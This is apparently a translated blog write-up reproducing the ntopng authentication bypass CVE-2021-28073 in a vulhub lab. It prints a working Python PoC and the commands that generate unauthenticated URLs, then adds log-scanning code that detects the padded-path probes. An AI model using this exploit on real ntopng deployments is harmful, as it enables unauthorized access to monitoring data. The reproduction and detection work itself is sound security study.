
ntopng authentication bypass vulnerability (CVE-2021-28073) reproduction

2021-04-10 13:04:42



0x01 Affected versions

ntopng commit < e8b9721479f401f595c5c7bb151819aceb03ad71

0x02 Environment setup

https://github.com/vulhub/vulhub/tree/master/ntopng/CVE-2021-28073
docker-compose up -d

Open yourip:3000 to reach the environment and log in as admin:admin.

0x03 Reproduction

PoC:

import sys
import requests
import argparse
import logging


# base_url, base_length and session are module-level globals; they are assigned in the
# __main__ block below and read by the helper functions at call time.


def is_ntopng() -> bool:
    # An unauthenticated request to the base URL is redirected to the login page on ntopng
    response = session.get(base_url, allow_redirects=False)
    return response.status_code == 302 and '/lua/login.lua' in response.headers.get('Location', '')


def get_base_length() -> int:
    # Probe with an increasing number of encoded "./" segments (each decodes to 2 bytes) in
    # front of a known script. The first probe that is served (status < 300) is the one whose
    # decoded path reaches the 255 - 1 limit, so the install path length can be solved from it.
    for i in range(90, 120):
        url = base_url + '/lua/' + '%2e%2f' * i + 'as_stats.lua.css'
        response = session.get(url, allow_redirects=False)
        if response.status_code < 300:
            return 255 - 1 - i * 2 - len('as_stats.lua')

    # Fallback probe with a second script name, in case the first one is not present
    for i in range(90, 120):
        url = base_url + '/lua/' + '%2e%2f' * i + 'get_macs_data.lua.css'
        response = session.get(url, allow_redirects=False)
        if response.status_code < 300:
            return 255 - 1 - i * 2 - len('get_macs_data.lua')

    return -1


def get_padding_length(path: str) -> int:
    # Number of "%2e%2f" repetitions needed so that install path + padding + script name
    # reaches 255 - 1 bytes; the padding must be even because each repetition is 2 bytes.
    padding_length = 255 - 1 - base_length - len(path)
    if padding_length % 2 == 1:
        raise RuntimeError(f'path {path} is not supported (padding length must be even)')

    return padding_length // 2


logging.basicConfig(stream=sys.stderr, level=logging.WARNING)
session = requests.Session()
session.headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='CVE-2021-28073 POC for ntopng.')
    parser.add_argument('-u', '--url', help='base url for ntopng, eg: http://192.168.1.233:3000', metavar='<URL>', required=True)
    parser.add_argument('-v', '--verbose', default=False, action='store_true')

    subparsers = parser.add_subparsers(dest='action')

    baselength_command = subparsers.add_parser('baselength', help='get base path length of ntopng')

    generate_command = subparsers.add_parser('generate', help='generate the authenticate bypass url')
    generate_command.add_argument('-l', '--length', type=int, help='base path length of target ntopng', metavar='<LENGTH>', required=True)
    generate_command.add_argument('-p', '--path', help='lua pathname', metavar='<PATH>', required=True)

    include_command = subparsers.add_parser('include', help='generate the arbitrary file inclusion url')
    include_command.add_argument('-l', '--length', type=int, help='base path length of target ntopng', metavar='<LENGTH>', required=True)
    include_command.add_argument('-i', '--include', help='path to include', metavar='<PATH>', required=True)

    args = parser.parse_args()
    if not args.action:
        parser.print_help()
        sys.exit(1)

    if args.verbose:
        # logging.basicConfig is a no-op once logging is configured, so raise the level explicitly
        logging.getLogger().setLevel(logging.DEBUG)

    base_url = args.url.rstrip('/')

    # check target
    if not is_ntopng():
        raise RuntimeError('No Ntopng detected')

    if args.action == 'baselength':
        base_length = get_base_length()
        sys.stdout.write(f'ntopng install path length: {base_length}\n')
    elif args.action == 'generate':
        base_length = args.length
        path = args.path
        sys.stdout.write(base_url + '/lua/' + '%2e%2f' * get_padding_length(path) + path + '.css\n')
    # The posted PoC declares the 'include' subcommand but contains no handler for it.

Read the install path length and generate the unauthorized-access URL:

python3 poc.py --url ip:port baselength
python3 poc.py --url ip:port generate -l 36 -p find_prefs.lua

Visiting the generated URL returns the page content without authorization.
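As an added example (not from the original post and not ntopng project code), the following Python detection logic scans constructed access-log lines for the request shape the PoC above produces: a path under /lua/ padded with percent-encoded "./" segments, ending in a Lua script name with a static-asset suffix such as .lua.css. The log line format, the sample traffic and the dot-segment threshold are assumptions made for this example.

```python
import re
from urllib.parse import unquote

# Access-log format assumed for this example:  client "METHOD path HTTP/x.y" status
LOG_RE = re.compile(
    r'^(?P<client>\S+) "(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})$'
)

# A Lua script name immediately followed by a static-asset extension (e.g. "find_prefs.lua.css")
LUA_WITH_STATIC_SUFFIX = re.compile(r'\.lua\.(?:css|js|png|gif|jpg|ico|woff2?)$', re.IGNORECASE)

# "./" or "../" segments; each "%2e%2f" in the probe URL decodes to one "./"
DOT_SEGMENT = re.compile(r'\.{1,2}/')

# Assumption: legitimate ntopng URLs under /lua/ carry no dot segments at all,
# so a small threshold already separates probes from normal traffic.
MAX_DOT_SEGMENTS = 3


def parse_line(line: str):
    """Split one access-log line into its fields, or return None if it does not match."""
    match = LOG_RE.match(line.strip())
    return match.groupdict() if match else None


def analyze_path(raw_path: str) -> list:
    """Return the reasons a request path resembles the CVE-2021-28073 probe ([] if none)."""
    path = raw_path.split('?', 1)[0]
    decoded = unquote(path)
    reasons = []
    if not decoded.startswith('/lua/'):
        return reasons
    dot_segments = len(DOT_SEGMENT.findall(decoded))
    if dot_segments > MAX_DOT_SEGMENTS:
        reasons.append(f'{dot_segments} dot segments under /lua/')
    if LUA_WITH_STATIC_SUFFIX.search(decoded):
        reasons.append('Lua script requested with a static-asset suffix')
    if '%2e' in path.lower():
        reasons.append('percent-encoded dots in path')
    return reasons


def scan_log(text: str) -> list:
    """Return one finding per suspicious request, preserving log order."""
    findings = []
    for line in text.splitlines():
        record = parse_line(line)
        if record is None:
            continue
        reasons = analyze_path(record['path'])
        if reasons:
            findings.append({
                'client': record['client'],
                'status': int(record['status']),
                'decoded_length': len(unquote(record['path'])),
                'reasons': reasons,
            })
    return findings


# Constructed sample traffic (not captured from a real system). The fourth line is shaped
# like the URL the PoC's "generate" subcommand emits for a 36-byte install path.
PROBE_PATH = '/lua/' + '%2e%2f' * 102 + 'find_prefs.lua.css'
SAMPLE_LOG = '\n'.join([
    '10.0.0.5 "GET /lua/login.lua HTTP/1.1" 200',
    '10.0.0.5 "GET /lua/find_prefs.lua HTTP/1.1" 302',
    '10.0.0.5 "GET /css/ntopng.css HTTP/1.1" 200',
    f'10.0.0.9 "GET {PROBE_PATH} HTTP/1.1" 200',
    '10.0.0.9 "GET /lua/%2e%2fas_stats.lua HTTP/1.1" 302',
])


if __name__ == '__main__':
    for finding in scan_log(SAMPLE_LOG):
        print(finding['client'], finding['status'], finding['decoded_length'], '; '.join(finding['reasons']))
```

The decoded length is reported alongside the reasons because the PoC sizes its padding from the 255 - 1 limit, so a cluster of requests from one client whose decoded paths creep upward in 2-byte steps (the baselength probe loop) stands out even before any single request is served with status 200.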

Source: https://www.cnblogs.com/Stunmaker/p/14640503.html
